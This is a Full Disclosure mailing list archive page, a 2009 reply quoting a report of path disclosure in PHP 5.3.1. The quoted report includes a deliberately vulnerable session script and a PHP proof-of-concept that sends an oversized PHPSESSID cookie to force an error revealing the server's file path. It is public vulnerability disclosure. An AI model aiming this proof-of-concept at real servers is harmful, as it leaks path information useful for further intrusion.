Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Path disclosure in PHP 5.3.1

From: Jeff Williams <jeffwillis30 () gmail com>
Date: Sun, 27 Dec 2009 17:01:59 +1100
Oh no a full path !


2009/12/27 WHK <www.kernel32 () gmail com>


Make a script vulnerable:
<?php
session_start();
if($_SESSION)
 echo $_SESSION;
else
 $_SESSION = 'xx';
?>

Now look the script in you explorer and change the value of cookie
"PHPSESSID" to 300 chars "a" and look the disclosure:
Warning: session_start() [function.session-start]:
open(/tmp/sess_aaaaaaaaaaaaaaaaaa ..... aa in /opt/lampp/htdocs/test.php
on line 3

PoC:
<?php
error_reporting(0);

$payload =
'GET / HTTP/1.1
Host: 127.0.0.1
Connection: close
Cookie: PHPSESSID='.str_repeat('a', 500).';

';

if(!$handle = fsockopen('127.0.0.1', 80)){
 die('Error');
}else{
 fputs($handle, $payload);
 while(!feof($handle)){
  $retorno .= fread($handle, 1024);
 }
 echo nl2br(htmlspecialchars($retorno, ENT_QUOTES));
}
?>

if value of cookie is "aaaaaaa" then file in temp of server is
"sess_aaaaaaa", if value of cookie is ax300 dont make file and return
the error message.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: